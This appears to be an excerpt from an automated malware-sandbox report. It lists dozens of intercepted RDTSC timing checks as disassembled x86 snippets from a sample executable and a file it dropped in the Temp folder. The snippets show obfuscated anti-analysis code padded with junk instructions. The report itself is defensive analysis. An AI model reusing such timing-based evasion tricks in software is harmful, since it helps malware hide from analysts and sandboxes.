Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04D0 second address: 4CC053F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 484AB547h 0x00000008 call 00007F8C5452242Ch 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007F8CC53003CAh 0x00000017 pushad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop edx 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F8C54522434h 0x00000022 adc si, A658h 0x00000027 jmp 00007F8C5452242Bh 0x0000002c popfd 0x0000002d popad 0x0000002e js 00007F8C54522479h 0x00000034 jmp 00007F8C54522436h 0x00000039 cmp dword ptr [ebp-14h], edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC053F second address: 4CC055C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC055C second address: 4CC057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F8CC530035Bh 0x00000010 pushad 0x00000011 mov eax, edx 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC057C second address: 4CC0580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0580 second address: 4CC0595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0595 second address: 4CC05E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007F8C5451FBBEh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 mov eax, 75DEF623h 0x00000019 mov ch, D1h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F8C5451FBBBh 0x00000024 jmp 00007F8C5451FBC3h 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC05E8 second address: 4CC061D instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F8C54522432h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8C54522437h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC061D second address: 4CC0641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0641 second address: 4CC0645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0645 second address: 4CC0649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0649 second address: 4CC064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06CC second address: 4CC0009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F8C5451FBBEh 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8C5451FBBEh 0x00000019 adc esi, 5E4F7468h 0x0000001f jmp 00007F8C5451FBBBh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F8C5451FBC8h 0x0000002b and cx, 46C8h 0x00000030 jmp 00007F8C5451FBBBh 0x00000035 popfd 0x00000036 popad 0x00000037 je 00007F8CC52FDACBh 0x0000003d xor eax, eax 0x0000003f jmp 00007F8C544F92EAh 0x00000044 pop esi 0x00000045 pop edi 0x00000046 pop ebx 0x00000047 leave 0x00000048 retn 0004h 0x0000004b nop 0x0000004c mov edi, eax 0x0000004e cmp edi, 00000000h 0x00000051 setne al 0x00000054 xor ebx, ebx 0x00000056 test al, 01h 0x00000058 jne 00007F8C5451FBB7h 0x0000005a jmp 00007F8C5451FCA9h 0x0000005f call 00007F8C58CB7330h 0x00000064 mov edi, edi 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 mov ah, bl 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0009 second address: 4CC000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC000E second address: 4CC0024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov dx, A6DCh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0024 second address: 4CC0058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C54522430h 0x00000009 or ecx, 5B037FF8h 0x0000000f jmp 00007F8C5452242Bh 0x00000014 popfd 0x00000015 mov bl, cl 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov si, A727h 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0058 second address: 4CC0067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop esi 0x0000000c mov bl, 1Ch 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0067 second address: 4CC006D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C17 second address: 4CC0C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C5451FBBFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C2B second address: 4CC0C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 cmp dword ptr [75AF459Ch], 05h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8C5452242Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C46 second address: 4CC0C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C4C second address: 4CC0C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C50 second address: 4CC0C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8CC52ED95Dh 0x0000000e jmp 00007F8C5451FBC7h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C7B second address: 4CC0C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0031 second address: 4CD0041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0041 second address: 4CD0045 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0045 second address: 4CD0056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0056 second address: 4CD005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD005B second address: 4CD00C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 movzx eax, bx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007F8C5451FBC5h 0x00000020 pop eax 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F8C5451FBC1h 0x00000028 adc ch, 00000036h 0x0000002b jmp 00007F8C5451FBC1h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movzx ecx, bx 0x0000003c mov ecx, edi 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00C2 second address: 4CD0132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8C5452242Bh 0x00000013 sbb si, 851Eh 0x00000018 jmp 00007F8C54522439h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 popad 0x00000023 call 00007F8CC52E7E99h 0x00000028 push 75A92B70h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov eax, dword ptr [esp+10h] 0x00000038 mov dword ptr [esp+10h], ebp 0x0000003c lea ebp, dword ptr [esp+10h] 0x00000040 sub esp, eax 0x00000042 push ebx 0x00000043 push esi 0x00000044 push edi 0x00000045 mov eax, dword ptr [75AF4538h] 0x0000004a xor dword ptr [ebp-04h], eax 0x0000004d xor eax, ebp 0x0000004f push eax 0x00000050 mov dword ptr [ebp-18h], esp 0x00000053 push dword ptr [ebp-08h] 0x00000056 mov eax, dword ptr [ebp-04h] 0x00000059 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000060 mov dword ptr [ebp-08h], eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 mov dword ptr fs:[00000000h], eax 0x0000006c ret 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 pushfd 0x00000071 jmp 00007F8C54522434h 0x00000076 jmp 00007F8C54522435h 0x0000007b popfd 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD01B1 second address: 4CD01B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD01B5 second address: 4CD01D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD01D2 second address: 4CD01D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD01D8 second address: 4CD01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD01DC second address: 4CD0202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp+08h], 00002000h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0202 second address: 4CD0208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0019 second address: 4CE0053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C5451FBC7h 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8C5451FBC7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0053 second address: 4CE00C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C54522432h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8C54522437h 0x00000016 adc ch, FFFFFFCEh 0x00000019 jmp 00007F8C54522439h 0x0000001e popfd 0x0000001f mov edi, esi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8C54522439h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE00C5 second address: 4CE00CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE00CB second address: 4CE00FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C54522435h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE00FC second address: 4CE011C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, 3Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8C5451FBC1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE011C second address: 4CE0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C54522431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0131 second address: 4CE018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8C5451FBC3h 0x00000013 xor ax, E00Eh 0x00000018 jmp 00007F8C5451FBC9h 0x0000001d popfd 0x0000001e call 00007F8C5451FBC0h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE018F second address: 4CE01AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C54522437h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01AA second address: 4CE0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8C5451FBC1h 0x00000013 and ah, 00000056h 0x00000016 jmp 00007F8C5451FBC1h 0x0000001b popfd 0x0000001c mov dx, ax 0x0000001f popad 0x00000020 mov edx, eax 0x00000022 popad 0x00000023 test esi, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, ebx 0x0000002a call 00007F8C5451FBC7h 0x0000002f pop ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0205 second address: 4CE021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C54522435h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE021E second address: 4CE0231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8CC52CDD47h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0231 second address: 4CE0236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0236 second address: 4CE027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 jmp 00007F8C5451FBBEh 0x00000015 je 00007F8CC52E5DEDh 0x0000001b jmp 00007F8C5451FBC0h 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE027D second address: 4CE0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0281 second address: 4CE0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0285 second address: 4CE028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE037C second address: 4CE0380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0380 second address: 4CE0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0386 second address: 4CE038C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE038C second address: 4CE03CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F8C54522430h 0x00000011 pushfd 0x00000012 jmp 00007F8C54522432h 0x00000017 sub esi, 0E2C6FC8h 0x0000001d jmp 00007F8C5452242Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE042D second address: 4CE0443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5451FBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: D7F1CE second address: D7F1D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: D7F1D5 second address: D7F1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C5451FBC5h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFEF70 second address: EFEF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFEF77 second address: EFEF7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF26C second address: EFF272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF535 second address: EFF578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F8C5451FBC3h 0x0000000a jmp 00007F8C5451FBBFh 0x0000000f pop edx 0x00000010 popad 0x00000011 jl 00007F8C5451FBDDh 0x00000017 jmp 00007F8C5451FBC1h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF6D5 second address: EFF6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF6DB second address: EFF6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF6DF second address: EFF6E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF6E5 second address: EFF708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8C5451FBC9h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF708 second address: EFF70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF70C second address: EFF716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF716 second address: EFF731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8C5452242Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: EFF731 second address: EFF735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F0291A second address: F02952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C5452242Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F8C54522432h 0x0000000f pop ecx 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F8C5452242Ch 0x0000001d jnl 00007F8C54522426h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02952 second address: F02984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C5451FBBCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e or dword ptr [ebp+122D2BAFh], edx 0x00000014 lea ebx, dword ptr [ebp+12457704h] 0x0000001a xor di, 3A6Ch 0x0000001f clc 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jnl 00007F8C5451FBB6h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F02984 second address: F0298A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0BSU3F1DFM4GF1Y0TBRRGTML6V.exe RDTSC instruction interceptor: First address: F0298A second address: F029A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C5451FBC2h 0x00000009 rdtsc
